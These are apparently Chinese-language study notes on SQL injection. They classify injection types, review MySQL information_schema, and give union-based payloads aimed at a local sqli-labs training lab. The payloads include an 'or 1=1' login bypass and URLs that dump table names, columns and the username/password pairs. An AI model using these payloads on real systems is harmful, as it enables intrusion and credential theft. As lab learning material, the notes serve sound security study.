SELECT * FROM admin WHERE Username='user' and Password='pass'
SELECT * FROM admin WHERE Username='1' or 1=1 # and Password='pass'
SQL注入分類
根據請求方式不同
GET方式請求注入
POST方式請求注入
根據sql注入點的參數類型
整數型注入
字符型注入
搜索型
根據sql注入點的反饋類型
union類型的sql注入 聯合查詢注入
基於錯誤顯示的sql注入 報錯注入
布爾類型的sql注入 布爾注入
基於時間的sql注入 延時注入
根據web應用常用的數據庫類型
Mysql數據庫注入
SQLServer數據庫注入
Oracle數據庫注入
Access數據庫注入
Mongodb
根據sql語句類型分類
Select
Insert/update
delete
msyql數據庫基礎操作:
基礎常用命令
mysql -uroot -p 密碼
information數據庫
Schemata
schema_name
Tables
table_schema
table_name
select table_name from tables where table_schema='dvwa’;
select table_name from tables where
table_schema='security';
columns
TABLE_SCHEMA
TABLE_NAME
COLUMN_NAME 字段名
爆數據表
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3
爆字段
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3
數據拖庫
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3